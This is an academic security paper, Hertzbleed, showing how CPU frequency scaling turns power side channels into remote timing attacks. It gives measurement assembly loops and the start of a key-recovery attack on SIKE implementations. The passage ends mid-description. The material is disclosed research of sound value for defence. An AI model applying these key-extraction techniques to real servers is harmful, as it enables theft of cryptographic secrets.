Hertzbleed: Turning Power Side-Channel Attacks

   Into Remote Timing Attacks on x86

   Abstract

   Power side-channel attacks exploit data-dependent varia-

   tions in a CPU’s power consumption to leak secrets. In this

   paper, we show that on modern Intel (and AMD) x86 CPUs,

   power side-channel attacks can be turned into timing attacks

   that can be mounted without access to any power measure-

   ment interface. Our discovery is enabled by dynamic voltage

   and frequency scaling (DVFS). We find that, under certain

   circumstances, DVFS-induced variations in CPU frequency

   depend on the current power consumption (and hence, data)

   at the granularity of milliseconds. Making matters worse,

   these variations can be observed by a remote attacker, since

   frequency differences translate to wall time differences!

   The frequency side channel is theoretically more powerful

   than the software side channels considered in cryptographic

   engineering practice today, but it is difficult to exploit because

   it has a coarse granularity. Yet, we show that this new channel

   is a real threat to the security of cryptographic software. First,

   we reverse engineer the dependency between data, power,

   and frequency on a modern x86 CPU—finding, among other

   things, that differences as seemingly minute as a set bit’s

   position in a word can be distinguished through frequency

   changes. Second, we describe a novel chosen-ciphertext at-

   tack against (constant-time implementations of) SIKE, a post-

   quantum key encapsulation mechanism, that amplifies a sin-

   gle key-bit guess into many thousands of high- or low-power

   operations, allowing full key extraction via remote timing.

   1 Introduction

   Power-analysis attacks have been known for decades to be

   a powerful source of side channel information leakage. His-

   torically, these attacks were used to leak cryptographic se-

   crets from embedded devices like smart cards using physical

   probes [3,39,59,68,74,75]. Recently, however, power-analysis

   attacks have been shown to be exploitable also via software

   power measurement interfaces. Such interfaces, available

   ∗These authors contributed equally to this work.

   on many of today’s general-purpose processors, have been

   abused to fingerprint websites [95], recover RSA keys [70],

   break KASLR [63], and even recover AES-NI keys [64].

   Fortunately, software-based power-analysis attacks can be

   mitigated and easily detected by blocking (or restricting [10])

   access to power measurement interfaces. Up until today, such

   a mitigation strategy would effectively reduce the attack sur-

   face to physical power analysis, a significantly smaller threat

   in the context of modern general-purpose x86 processors.

   In this paper, we show that, on modern Intel (and AMD)

   x86 CPUs, power-analysis attacks can be turned into timing

   attacks—effectively lifting the need for any power measure-

   ment interface. Our discovery is enabled by the aggressive dy-

   namic voltage and frequency scaling (DVFS) of these CPUs.

   DVFS is a commonly-used technique that consists of dynami-

   cally adjusting CPU frequency to reduce power consumption

   (during low CPU loads) and to ensure that the system stays

   below power and thermal limits (during high CPU loads). We

   find that, under certain circumstances, DVFS-induced CPU

   frequency adjustments depend on the current power consump-

   tion at the granularity of milliseconds. Therefore, since the

   power consumption is data dependent, it follows transitively

   that CPU frequency adjustments are data dependent too.

   Making matters worse, we show that data-dependent fre-

   quency adjustments can be observed without the need for any

   special privileges and even by a remote attacker. The reason is

   that CPU frequency differences directly translate to execution

   time differences (as 1 hertz = 1 cycle per second). The security

   implications of this finding are significant. For example, they

   fundamentally undermine constant-time programming, which

   has been the bedrock defense against timing attacks since their

   discovery in 1996 [58]. The premise behind constant-time

   programming is that by writing a program to only use “safe”

   instructions, whose latency is invariant to the data values, the

   program’s execution time will be data-independent. With the

   frequency channel, however, timing becomes a function of

   data—even when only safe instructions are used.

   Despite its theoretical power, it is not obvious how to con-

   struct practical exploits through the frequency side channel.

   This is because DVFS updates depend on the aggregate power

   consumption over millions of CPU cycles and only reflect

   coarse-grained program behavior. Yet, we show that the fre-

   quency side channel is a real threat to the security of crypto-

   graphic software, by (i) reverse engineering a precise leakage

   model for this channel on modern x86 CPUs, and (ii) showing

   that some cryptographic primitives admit amplification of

   single key bit guesses into thousands of high- or low-power

   operations, enough to induce a measurable timing difference.

   To construct a leakage model, we reverse engineer the de-

   pendency between data being computed on and power con-

   sumption / frequency on modern x86 Intel CPUs. Our results

   reveal that power consumption and CPU frequency depend on

   both the Hamming weight (HW) of data being processed and

   the Hamming distance (HD) of data across computations. We

   show, for the first time, that these two effects are distinct and

   additive on modern Intel CPUs. Further, the HW effect is non

   uniform. That is, computing on data with the same HW results

   in differences in power consumption / frequency depending

   on the position of individual 1s within data values. The take-

   away is that computing on data with different bit patterns

   depending on a secret can result in different power consump-

   tions and frequencies depending on that secret. We expect that

   this information will also be useful towards building future,

   Intel-specific power leakage emulators [11,60,72,87,89]. We

   find that AMD x86 CPUs also feature a similar leakage model,

   but leave reverse engineering its details to future work.

   We then describe a novel attack, including new cryptana-

   lytic techniques, on two production-ready, constant-time im-

   plementations of SIKE (Supersingular Isogeny Key Encap-

   sulation [52]). SIKE is a decade old, widely studied key en-

   capsulation mechanism. Unlike other finalists in NIST’s Post-

   Quantum Cryptography competition, SIKE has both short

   ciphertexts and short public keys — and a “well-understood”

   side channel posture [20]. In our attack, we show that, when

   provided with a specially-crafted input, SIKE’s decapsula-

   tion algorithm produces anomalous 0 values that depend on

   single bits of the key. Worse so, these values cause the algo-

   rithm to get stuck and operate on intermediate values that are

   also 0 for the remainder of the decapsulation. When this hap-

   pens, the processor consumes less power and runs at a higher

   frequency than usual, and therefore decapsulation takes a

   shorter wall time. This timing signal is so robust that key

   extraction is possible across a network, as we demonstrate

   for the SIKE implementations in both Cloudflare’s Interop-

   erable Reusable Cryptographic Library (CIRCL) [28] and

   Microsoft’s PQCrypto-SIDH [66]. Our unoptimized version

   of the attack recovers the full key from these libraries in 36

   and 89 hours, respectively. Finally, we show that the frequency

   side channel can also be used to mount timing attacks without

   a timer, such as a KASLR break and a covert channel.

   Disclosure We disclosed our findings, together with proof-

   of-concept code, to Intel, Cloudflare and Microsoft in Q3 2021

   and to AMD in Q1 2022. The attack was assigned CVE-2022-

   23823 and CVE-2022-24436 and held under embargo until

   June 14, 2022. Intel committed to awarding us a bug bounty.

   Cloudflare and Microsoft deployed a mitigation to CIRCL

   and PQCrypto-SIDH, respectively.

   2 Background and Related Work

   Intel P-States In Intel processors, dynamic voltage and fre-

   quency scaling (DVFS) works at the granularity of P-states.

   P-states correspond to different operating points (voltage-

   frequency pairs) in 100 MHz frequency increments [49]. The

   number of P-states varies across different CPU models. Mod-

   ern Intel processors offer two mechanisms to control P-states,

   namely SpeedStep and Speed Shift / Hardware Controlled Per-

   formance States (HWP). With SpeedStep, P-states are man-

   aged by the operating system (OS) using hardware coordina-

   tion feedback registers. With HWP, P-states are managed en-

   tirely by the processor, increasing the overall responsiveness.

   HWP was introduced with the Skylake microarchitecture [78].

   When HWP is enabled, the OS can only give hints to the pro-

   cessor’s internal P-state selection logic, including restricting

   the range of available P-states [91]. Otherwise, the available

   range of P-states depends only on the number of active cores

   and on whether “Turbo Boost” is enabled [55]. Our P-state

   naming convention follows the one used in Linux [91].1 The

   lowest P-state corresponds to the lowest supported CPU fre-

   quency. The highest P-state corresponds to the “max turbo”

   frequency for the processor. However, when Turbo Boost is

   disabled, the highest available P-state is the base frequency.

   We use the term P-state and frequency interchangeably.

   P-state management is also related to power management.

   Each Intel processor has a Thermal Design Point (TDP), indi-

   cating the expected power consumption at steady state under

   a sustained workload [22, 40]. While in the max turbo mode,

   the processor can exceed its nominal TDP [47]. However, if

   the CPU hits a certain power and thermal limit while in max

   turbo mode, the hardware will automatically downclock the

   frequency to stay at TDP for the duration of the workload.

   Data-Dependent Power Consumption It is well-known

   that a processor’s power consumption depends on the data

   being processed [46, 68]. The precise dependency between

   data and power consumption depends on the processor’s im-

   plementation, but can be approximated using leakage mod-

   els. Two commonly-used leakage models are the Hamming

   distance (HD) [9, 61, 68, 71, 77] and the Hamming weight

   (HW) [56, 61, 67, 71, 73, 74, 88] models. In the HD model,

   power consumption depends to the number of 1 → 0 and

   0 → 1 bit transitions occurring in the data during a computa-

   tion. In the HW model, power consumption just depends on

   the number of bits that are 1 in the data being processed.

   1However, Intel refers to higher frequencies as lower P-states [48,
   50].

   Table 1: CPUs tested in our experimental setups.

   CPU Model Microarchitecture Cores Base

   Frequency

   Max Turbo

   Frequency

   i7-8700 Coffee Lake 6 3.20 GHz 4.60 GHz

   i7-9700 Coffee Lake Refresh 8 3.00 GHz 4.70 GHz

   i9-10900K Comet Lake 10 3.70 GHz 5.30 GHz

   i7-11700 Rocket Lake 8 2.50 GHz 4.90 GHz

   i7-10850H Ice Lake (mobile) 6 2.70 GHz 5.10 GHz

   i7-1185G7 Tiger Lake (mobile) 4 3.00 GHz 4.80 GHz

   Power Side-Channel Attacks Power side-channel attacks

   against cryptosystems were first publicly discussed by Kocher

   in 1998 [59]. His work introduced analytical techniques that

   exploit the data dependency of power consumption to reveal

   secret keys. Following works demonstrated power-analysis

   attacks against several cryptographic algorithms including

   AES [14, 67], DES [74], RSA [30, 75, 80, 94], and ElGa-

   mal [16,30].2 However, all these attacks were targeted against

   smart cards and required physical access to the device. More

   recently, power side-channel attacks have been applied also to

   more complex devices such as smartphones [15,35,76,92,93]

   and PCs [36, 63, 64, 70, 95]. Some of these attacks rely only

   on software power measurement interfaces, meaning that they

   do not need proximity to the device. However, while some

   of these works use the HW and HD leakage models [64, 70],

   none of them presents a systematic reverse engineering of the

   dependency between power consumption and data on modern

   Intel x86 CPUs. Further, all these attacks can be blocked by

   restricting access to such power measurement interfaces.

   3 CPU Frequency Leakage Channel

   In this section, we analyze the leakage from CPU frequency

   variations on modern Intel processors. We show that, un-

   der certain circumstances, the distribution of a processor’s

   frequencies leaks information about the instructions being

   executed as well as the data being processed.

   Experimental Setup We run our experiments on several

   different machines. The characteristics of the CPU of each

   machine are reported in Table 1. All our machines run Ubuntu

   with versions either 18.04 or 20.04, kernel either 4.15 or 5.4,

   and the latest microcode patches installed. Unless otherwise

   noted, we use the default system configuration, without re-

   stricting the P-states. To monitor CPU frequency, we use the

   MSR_IA32_MPERF and MSR_IA32_APERF registers, as done in

   the Linux kernel [62]. To monitor power consumption, we

   use the MSRs of the RAPL interface, following Weaver [90].

   3.1 Distinguishing Instructions

   As a first step for our analysis, we set out to understand how

   running different workloads affects the P-state selection logic

   2For a comprehensive survey of these attacks, we refer to prior work
   [68].

   3.9

   4.0

   4.1

   4.2

   4.3

   4.4

   4.5

   Frequency (GHz)

   0 5 10 15

   Time (s)

   60

   70

   80

   90

   100

   110

   120 Power (W)

   (a) Run of the int32-float test

   3.9

   4.0

   4.1

   4.2

   4.3

   4.4

   4.5

   Frequency (GHz)

   0 5 10 15

   Time (s)

   60

   70

   80

   90

   100

   110

   120 Power (W)

   (b) Run of the int32 test

   Figure 1: Example of distinguishing workloads using fre-

   quency traces on our i7-9700 CPU. The lighter workload

   (int32) allows for longer runtimes at higher frequencies than

   the heavier workload (int32-float).

   of our CPUs. We pick two workloads from the stress-ng

   benchmark suite [57]. The first workload consists of 32-bit

   integer and floating-point operations (int32float method),

   while the second workload consists of only 32-bit integer oper-

   ations (int32 method). We run both benchmarks on all cores

   and starting from an idle machine. We sample the CPU fre-

   quency and the (package domain) power consumption every

   5 ms during the benchmark’s execution.

   Figure 1a shows the results for the int32float test on our

   i7-9700 CPU. The frequency starts at 4.5 GHz, the highest

   P-state available when all cores are active on our CPU. This

   frequency is sustained for about 8 seconds, during which the

   power consumption is allowed to exceed the TDP. Then, the

   CPU drops to a lower P-state, bringing the power consumption

   down to TDP (65 W on our CPU). From there onwards, the

   CPU remains in steady state and power stays around the TDP

   level for the duration of the workload. In our example, at

   steady state the frequency oscillates between two P-states,

   corresponding to the frequencies of 3.9 GHz and 4.0 GHz.

   Figure 1b shows the results for the int32 stress test. Here

   too, the frequency starts at 4.5 GHz and later drops to a lower

   P-state. However, compared to Figure 1a, (i) the drop occurs

   later, after 10 seconds, and (ii) the P-states used after the drop

   are higher, corresponding to 4.0 GHz and 4.1 GHz. This is

   because the power consumption of the int32 test is lower. As

   a consequence, not only can the processor sustain the highest

   available P-state for longer, but it can also use higher P-states

   in steady state without exceeding the TDP.

   The key takeaway from the above results is that both (i)

   the time that a processor can spend at the maximum available

   P-state and (ii) the distribution of P-states at steady state de-

   pend on the CPU power consumption. Since the CPU power

   consumption depends on the workload, by the transitive prop-

   erty it follows that P-states depend on the workload too. This

   implies that dynamic scaling of P-states leaks information

   about the current workload running on the processor.

   4.3 4.4

   Frequency (GHz)

   0.0

   0.2

   0.4

   0.6

   0.8

   Probability

   hw=16

   hw=32

   hw=48

   (a) Frequency at steady state

   19.5 20.0 20.5

   Seconds before steady state

   0

   2

   4

   6

   Probability density

   hw=16

   hw=32

   hw=48

   (b) Seconds before steady state

   Figure 2: Distinguishing data (in the source register to a shlx

   instruction) using frequency traces on our i7-9700 CPU. Fig-

   ure 2a is over 30,000 samples. Figure 2b is over 100 traces.

   3.2 Distinguishing Data

   We saw that P-state information leaks information about the

   instructions being executed (i.e., the workload). We now ex-

   plore if the frequency leakage channel can leak information

   about the data being processed by instructions. Our question

   is motivated by the fact that power consumption on x86 pro-

   cessors is known to be data dependent [64]. It is thus natural

   to ask: do data-dependent differences in power consumption

   show in the distribution of P-states?

   To answer this question, we monitor the CPU frequency

   while executing the same instructions and only changing the

   content of the input registers. For example, we use the shlx

   instruction to continuously shift left the bits of a source regis-

   ter and write the result into different destination registers in a

   loop, while only varying the content of the source register. We

   run this experiment on all cores and compare the distribution

   of the P-states in steady state. Figure 2a shows the results

   when we set the content of the source register to have 16, 32

   or 48 ones. In all cases the P-state oscillated between 4.3 GHz

   and 4.4 GHz. However, the larger the Hamming weight, the

   more the frequency stayed at the lower P-state. We also saw

   a data-dependent difference in terms of when the frequency

   drops to steady state if we start from idle (cf. Figure 2b). The

   larger the Hamming weight, the quicker the frequency drops

   to steady state. This is because, as we show in Section 4, pro-

   cessing data with larger Hamming weights consumes more

   power than processing data with lower Hamming weights.

   We get similar results with other instructions too. For ex-

   ample, we observed data-dependent effects when running or,

   xor, and, imul, add, sub, as well as when computing on data

   loaded from memory. The only caveat is that, for some in-

   structions, the power consumption of just running the target

   instruction in a loop on all cores was not large enough to

   cause the P-state to ever drop to steady state. In these cases,

   we ran an additional, fixed workload in the background to

   push the total power consumption up.

   The key takeaway of the above results is that dynamic

   scaling of P-states leaks information about the data being

   processed. In the following sections, we use the distribution

   of P-states at steady state as our leakage channel.

   4 CPU Frequency Leakage Model

   We saw that the power consumption and the distribution of

   P-states in Intel CPUs depend on the data being processed.

   The goal of this section is to construct a leakage model of this

   behavior. To this end, we reverse engineer the dependency be-

   tween power consumption/frequency and data on the ALU of

   modern Intel CPUs. As we show in Section 5, this information

   can help an attacker construct side-channel attacks.

   Scope Precisely understanding where power is dissipated

   as a function of data on general-purpose x86 processors is a

   challenging task. The reason is that the microarchitecture of

   modern x86 processors is (i) highly complex and (ii) largely

   undocumented. Fortunately, studying the power consumption

   across all microarchitectural units is not necessary to build

   attacks. This is because the vast majority of computations

   performed by modern, constant-time cryptographic software

   occurs in the arithmetic logic unit (ALU). Since our primary

   goal is to build a model that is useful to leak secrets from

   constant-time cryptographic code, the analysis in this section

   focuses specifically on the ALU component.

   Methodology We use the experimental setup of Section 3.

   In each experiment, we run a fixed set of ALU instructions

   (the sender) in a loop on all cores, while varying the input

   contents. We carefully design our senders to target specific

   behaviors and minimize side effects. First, to reduce power

   consumption from other core units such as the cache, we

   always use register to register instructions without any mem-

   ory access. Second, to avoid any datapath contamination ef-

   fects caused by incrementing the loop counter variable and

   evaluating loop conditions, we run our sender in an infinite

   loop that we manually terminate at the end of the experiment.

   Third, to avoid introducing unintended HD effects, we inter-

   leave different instructions in such a way that encourages full

   throughput on all available ports [1, 2]. Finally, we run each

   sender in two setups. In the first setup, we use the default

   system configuration, warm up the machine until it enters

   steady state, and monitor the frequency. In the second setup,

   we disable SpeedStep / HWP (this way, our processor stays

   at the base frequency for the duration of the workload) and

   monitor the (core domain) power consumption. We sample

   power/frequency every 1 ms, collect 30,000 data points for

   each experiment and use their mean for our analyses.

   4.1 Hamming Distance (HD) Effect

   To start, we set out to understand if the number of 1 → 0

   and 0 → 1 transitions affects power consumption / frequency.

   Recall that these transitions depend on the number of bits

   that differ (also known as the HD) between consecutive data

   values being processed. To study the dependency between HD

   and power consumption / frequency, we then need a sender

   that offers fine-grained control over the number of transitions,

   rax = COUNT

   rbx = 0x0000FFFFFFFF0000

   loop:

    shlx %rax,%rbx,%rcx // rcx = rbx << rax

    shlx %rax,%rbx,%rdx // rdx = rbx << rax

    shrx %rax,%rbx,%rsi // rsi = rbx >> rax

    shrx %rax,%rbx,%rdi // rdi = rbx >> rax

    shlx %rax,%rbx,%r8 // r8 = rbx << rax

    shlx %rax,%rbx,%r9 // r9 = rbx << rax

    shrx %rax,%rbx,%r10 // r10 = rbx >> rax

    shrx %rax,%rbx,%r11 // r11 = rbx >> rax

   jmp loop

   (a) Sender for our HD experiments.

   rax = LEFT

   rcx = … = r11 = RIGHT

   loop:

    or %rax,%rcx // rcx = rax | rcx

    or %rax,%rdx // rdx = rax | rdx

    or %rax,%rsi // rsi = rax | rsi

    or %rax,%rdi // rdi = rax | rdi

    or %rax,%r8 // r8 = rax | r8

    or %rax,%r9 // r9 = rax | r9

    or %rax,%r10 // r10 = rax | r10

    or %rax,%r11 // r11 = rax | r11

   jmp loop

   (b) Sender for our HW experiments.

   rax = rcx = rdx = rsi = rdi = FIRST

   rbx = r8 = r9 = r10 = r11 = SECOND

   loop:

    or %rax,%rcx // rcx = rax | rcx

    or %rax,%rdx // rdx = rax | rdx

    or %rax,%rsi // rsi = rax | rsi

    or %rax,%rdi // rdi = rax | rdi

    or %rbx,%r8 // r8 = rbx | r8

    or %rbx,%r9 // r9 = rbx | r9

    or %rbx,%r10 // r10 = rbx | r10

    or %rbx,%r11 // r11 = rbx | r11

   jmp loop

   (c) Sender for our HW+HD experiments.

   Figure 3: Different sets of instructions (senders) used to reverse
   engineer the dependency between data and power consumption /

   frequency on our CPUs. Different senders are designed to target
   different effects. Each sender can be run with variable inputs.

   0 5 10 15

   COUNT

   4.26

   4.27

   4.28

   4.29

   Frequency (GHz)

   (a) Frequency vs COUNT

   0 5 10 15

   COUNT

   23.2

   23.4

   23.6

   23.8

   Power (W)

   (b) Power vs COUNT

   Figure 4: Effect of increasing COUNT in Figure 3a’s sender

   on our i7-9700 CPU. Higher COUNT values cause higher HDs

   in the ALU output. As the HD increases, the mean power con-

   sumption grows and the mean steady-state frequency drops.

   while avoiding other potential side effects. For example, test-

   ing different HDs should not require changing the number of

   1s in the input (which, as we show below, is a separate effect).3

   We design our sender to use interleaved shlx and shrx

   instructions, as shown in Figure 3a. These instructions shift

   the bits of the second source register to the left or right by a

   COUNT value stored in the first source register. The result is

   written to a separate destination register. Since on our CPUs

   shlx and shrx execute on port 0 and port 6 [1], we interleave

   them in groups of two. We fix the content of the second source

   register to 0x0000ffffffff0000, corresponding to 16 zeros,

   followed by 32 ones, followed by 16 zeros. We then shift this

   register left and right by COUNT (with 0 ≤ COUNT ≤ 16).

   By construction, the HD in the ALU output between a shlx

   and a shrx is 4×COUNT. For example, when COUNT = 8,

   the output of each shlx is 0x00ffffffff000000, and the

   output of each shrx is 0x000000ffffffff00, translating to

   4×8 bit transitions in the ALU output. Yet, the ALU input

   remains unchanged and the number of 1s in the source and

   the destination registers is fixed.4

   3This requirement implies that approaches such as using a xor
   instruction

   to cause bit transitions are not suitable, because triggering different
   numbers

   of transitions would also require using different numbers of 1s in the
   input.

   4The only other variable is the number of 1s in the COUNT register
   itself,

   Figure 4 shows the results when we vary the COUNT value.

   We see that the power consumption grows and the frequency

   drops when COUNT grows, confirming that the number of bit

   transitions directly affects power consumption and frequency.

   In Appendix A.1, we corroborate this observation with an ad-

   ditional experiment where transitions occur in the ALU input.

   These results are consistent on all the CPUs of Table 1.

   1. Larger Hamming distances between data values being

   processed contribute to larger power consumptions and

   lower steady-state frequencies.

   4.2 Hamming Weight (HW) Effect

   We now set out to understand if the HW of the data values be-

   ing processed affects power consumption / frequency. Recall

   that the idea behind the HW model is that power consumption

   depends on the number of 1s in the data being processed. To

   study the dependency between HW and power consumption /

   frequency, we need a sender that offers fine-grained control

   over the number of 1s, while avoiding other potential side

   effects. For example, testing different HWs should not require

   bit transitions in the data (i.e., the HD effect).

   To satisfy the above requirements, we design a sender that

   uses or logic instructions, as shown in Figure 3b. These in-

   structions perform a bitwise inclusive or operation between

   the source register and the destination register, and store the

   result in the destination register. We always use the same

   input and output registers for all the or instructions in the

   loop. We fix the content of the source register to LEFT, and

   set the initial content of the output register to RIGHT.

   By construction, the number of bit transitions occurring on

   the ALU input and output during the execution of the above

   sender is zero. The reason is that all or instructions take the

   same inputs and produce the same output during an experi-

   ment. Hence, we can test different HW in the source registers

   without introducing any HD effects. An added benefit of us-

   ing or instructions is that they allow us to study the effects

   which varies between 1 and 4. However, this effect is negligible.

   0 20 40 60

   Hamming weight

   4.12

   4.14

   4.16

   Frequency (GHz)

   From LSB

   From MSB

   (a) Frequency vs HW

   0 20 40 60

   Hamming weight

   26.25

   26.50

   26.75

   27.00

   27.25

   Power (W)

   From LSB

   From MSB

   (b) Power vs HW

   Figure 5: Effect of varying the number of consecutive 1s in

   the LEFT = RIGHT input to Figure 3b’s sender on our i7-9700

   CPU. As we increase the number of 1s, the mean power con-

   sumption grows and the mean steady-state frequency drops.

   of changing some bits of the input register (LEFT) without

   affecting the contents of the output register (RIGHT). We use

   this sender to perform multiple experiments.

   Consecutive 1s We start our analysis of the HW effect by

   checking if the number of leading or trailing 1s in the data af-

   fects power consumption / frequency. We set LEFT = RIGHT

   such that the inputs and outputs of all or instructions are al-

   ways the same. We then run the sender with a varying HW in

   the LEFT = RIGHT values. Figure 5 shows the results when

   the HW grows from 0 to 64, both when the 1s start from the

   least significant bit (LSB) and when they start from the most

   significant bit (MSB). In both cases, the power consumption

   grows and the frequency drops when the HW grows.

   2. A larger number of leading or trailing 1s in the data

   values being processed contributes to larger power con-

   sumptions and lower steady-state frequencies.

   We also see that the changes in power consumption and

   frequency appear to be nonlinear. That is, the plots of Figure 5

   have a “bow” shape, suggesting that the HW effect is stronger

   for the most significant 32 bits than for the least significant 32

   bits. For example, when the input is 0xffffffff00000000

   (HW=32, orange line), the HW effect is larger than when it

   is 0x00000000ffffffff (HW=32, blue line). This suggests

   that given data values with the same HW, their contribution

   power / frequency may also depend on the position of 1s. We

   thoroughly examine this observation later in this subsection.

   Non-consecutive 1s The above experiment shows that

   power consumption and frequency can depend on the HW of

   the data being processed. However, it only focuses on a bit

   pattern of consecutive 1s and 0s. In reality, 1s and 0s might

   occur in anywhere in the data. For our model to be useful, we

   need to test if the HW effect applies to arbitrary bit patterns.

   To analyze the HW effect in the presence of non-

   consecutive 1s, we run a variant of our previous experiment,

   where we increase the HW at byte granularity. That is, we

   break the 64-bit registers LEFT = RIGHT into 8 bytes and

   0 2 4 6 8

   Hamming weight

   4.12

   4.14

   4.16

   Frequency (GHz)

   (a) Frequency vs HW

   0 2 4 6 8

   Hamming weight

   26.25

   26.50

   26.75

   27.00

   27.25

   Power (W)

   (b) Power vs HW

   Figure 6: Effect of varying the number of non-consecutive 1s

   in the LEFT = RIGHT input to Figure 3b’s sender on our i7-

   9700 CPU. The results confirm that larger HWs cause higher

   power consumptions and lower steady-state frequencies.

   0 1 2 3 4 5 6 7

   Byte index

   0.008

   0.006

   0.004

    Frequency (GHz)

   (a) Effect of 0xFF to frequency

   0 1 2 3 4 5 6 7

   Byte index

   0.10

   0.15

   0.20

    Power (W)

   (b) Effect of 0xFF to power

   Figure 7: Effect of setting single bytes to 0xff in the LEFT =

   RIGHT input to Figure 3b’s sender on our i7-9700 CPU. The

   effect varies depending on the position of 1s within the inputs.

   HW differences in the MSBs have the strongest effect; HW

   differences in the bits right below 32 have the weakest effect.

   vary the HW within each byte. Increasing the HW within

   each byte allows us to measure the impact of different num-

   bers of non-consecutive 1s. For example, when the HW for

   each byte is 2, we set 2 bits of each byte to 1, for a total HW

   of 2×8 = 16. Figure 6 shows the results, clearly indicating

   that a larger number of non-consecutive 1s contributes to a

   larger power consumption and lower CPU frequency.

   3. A larger Hamming weight (number of 1s) in the data

   values being processed contributes to larger power con-

   sumptions and lower steady-state frequencies regardless

   of whether the 1s are consecutive or not.

   Non-uniformity of the HW Effect To analyze the impact

   of the position of 1s within the data, we run another variant

   of our previous experiment. We break the 64-bit registers

   LEFT = RIGHT into 8 bytes. Each byte can be set to 0x00 (all

   0s) or 0xff (all 1s). When we target byte i, we fix the value of

   the other 7 bytes and compute the delta of power consumption

   / frequency between setting byte i to 0xff and 0x00. For each

   byte, we repeat this test with all the 2

   7

   combinations of the

   other 7 bytes. We compute the average and standard deviation

   of the deltas for each byte and show the result in Figure 7.

   We immediately see that the HW effect is non-uniform

   across different bytes. At a high level, the 4 most significant

   bytes have a stronger HW effect than the 4 least significant

   bytes, and bytes closer to the 32nd bit have a weaker HW

   effect than bytes farther from the 32nd bit. This is consis-

   tent with our previous observation that an input where the

   most significant 32 bits are 1 consumes more power than an

   input where the least significant 32 bits are 1, even if their

   HWs are the same. Further, the standard deviations are rel-

   atively small, suggesting that the HW effect of each byte

   is independent of the values of other bytes. For example,

   the power/frequency deltas between 0x0000ff0000000000

   and 0x000000000000000 are the same as the ones between

   0xff00ffff00ffffff and 0xff0000ff00ffffff. We sus-

   pect that these properties also hold a bit granularity, but are

   unable to confirm because it would require collecting data for

   2

   64 bit combinations for a runtime of more than 1013 years.

   Note that the difference in the HW effect due to the position

   of 1s is relatively small (e.g., ≤ 0.12 W in Figure 7b) com-

   pared to the difference in the HW effect due to the number of

   1s (e.g., ≤ 1.11 W in Figures 5b and 6b) and the HD effect

   due to bit transitions (e.g., ≤ 0.75 W in Figure 4b).

   4. The HW effect is non-uniform. 1s in the most signifi-

   cant bytes affect power and frequency more than 1s in

   the least significant bytes. Additionally, the HW effect

   at each byte is independent of the values of other bytes.

   The above experiments show that power consumption and

   frequency depend both on the number and the positions of

   1s in the data being processed. However, both experiments

   were designed using LEFT = RIGHT, meaning that all the

   source and destination registers used by the sender during

   an experiment were the same. It is then natural to ask: does

   the HW effect occur even when LEFT 6= RIGHT? To answer

   this question, we repeated the above two experiments, but

   this time set LEFT = 0 and only varied the HW of RIGHT.

   5

   Both experiments yielded results similar to the ones where

   LEFT = RIGHT, albeit with smaller increments/decrements in

   power/frequency. This result shows that the HW effect on an

   operand is independent of the contents of other operands.

   5. The HW effect occurs on each operand independently.

   To sum up, the HW effect may be approximated as a linear

   combination of two vectors. The first vector is the number of

   1s per byte, and the second vector is the non-uniform power

   consumption / frequency “cost” of 1s in that byte (based on

   the deltas of Figure 7). In Appendix A.1 we discuss additional

   experiments in support of this model. We verified that this

   model applies to all the CPUs of Table 1. However, the non-

   uniform “costs” per byte of the HW effect can be different

   across CPU models. For example, in the 11th gen CPUs, the

   HW effect is more uniform compared to Figure 7.

   5Whether LEFT = 0 or LEFT = RIGHT, the result of the or is still RIGHT.

   0 20 40 60

   HW of SECOND

   3.98

   4.00

   4.02

   4.04

   Frequency (GHz)

   A

   B

   C

   D

   (a) Frequency vs HW

   0 20 40 60

   HW of SECOND

   29.5

   30.0

   30.5

   31.0

   Power (W)

   A

   B

   C

   D

   (b) Power vs HW

   Figure 8: Effect of increasing the HW of SECOND in Fig-

   ure 3c’s sender, while fixing FIRST to different values on our

   i7-9700 CPU. Power consumption grows and steady-state

   frequency drops when both HW and HD increase at the same

   time (net effect of HW+HD). However, power consumption

   drops and steady-state frequency grows when HW increments

   correspond to HD decrements (net effect of HW−HD).

   4.3 Additivity of the HW and HD Effects

   Finally, we set out to understand if the HD and HW effects are

   additive. To this end, we design our sender to use or instruc-

   tions with interleaved operand contents, as shown in Figure 3c.

   In this sender, half of the instructions computes FIRST|FIRST

   and the other half computes SECOND|SECOND. We in-

   terleave these instructions in groups of four, since on

   our CPUs or instructions use four ports [1]. We then

   test setting FIRST to be A = 0x000000000000ffff, B =

   0xffff000000000000, C = 0x00000000ffffffff, or D =

   0xffffffff00000000, and increase the HW of SECOND

   from 0 to 64, starting from the least significant bit.

   Figure 8 shows the results. Consider the case when FIRST

   = C. As the HW of SECOND increases from 0 to 32, the HD

   between FIRST and SECOND decreases, causing the power

   consumption to drop and the frequency to grow. However, as

   HW of SECOND increases from 32 to 64, the HD between

   FIRST and SECOND increases, causing the opposite effect.

   The slope between 0 and 32 is smaller than the one between

   32 and 64. This is because the former is a net effect of HW

   minus HD whereas the latter is a net effect of HD plus HW.

   For the other values of FIRST, we see analogous effects but

   with different constant offsets. This result (consistent across

   the CPUs of Table 1) shows that the HW and the HD effects

   can simultaneously contribute to power and frequency.

   6. The HD and HW effects are additive and can simulta-

   neously contribute to differences in power consumption

   and steady-state frequency.

   5 Remote Timing Attack on SIKE

   The previous sections have shown that carefully crafted in-

   struction sequences can trigger data-dependent power con-

   sumption and frequency differences. In this section, we show

   that the frequency side channel threat extends to in-the-wild

   software. Specifically, we show how to use the frequency side

   channel, combined with novel cryptanalysis, for a full key

   recovery attack through remote timing on two production-

   ready, side-channel hardened implementations of Supersingu-

   lar Isogeny Key Encapsulation (SIKE) [52], a post-quantum

   key encapsulation mechanism based on the Supersingular

   Isogeny Diffie-Hellman (SIDH) [53] key exchange protocol.

   Attack Model We assume a chosen-ciphertext attack model

   (CCA). The goal of the attacker (client) is to recover the

   static secret key used by the victim (server) to decapsulate

   ciphertexts. The attacker can send many ciphertexts to the

   victim, which always tries to compute the shared secret with

   the decapsulation procedure using its static secret key.

   Attack Idea The server’s static secret key is an integer m

   with bit expansion m = (m`−1,...,m0)2, where ` = 378 (for

   SIKE-751, the parameter selection we target in our experi-

   ments). During decapsulation, the server computes P+[m]Q

   for elliptic curve points P and Q included in the ciphertext;

   the SIKE standard prescribes a particularly efficient algorithm

   for evaluating this expression, the Montgomery three-point

   ladder [29]. We show that an attacker who knows the i least

   significant bits of m can construct points P and Q such that:

   • If mi 6= mi−1, then the (i+1)st round of the Montgomery

   three-point ladder produces an anomalous 0 value. Once

   that anomalous 0 value appears, the decapsulation algo-

   rithm gets stuck: every intermediate value produced for the

   remainder of the ladder is 0. Additionally, every intermedi-

   ate value produced for the function (isogeny computation)

   following the ladder is also 0.
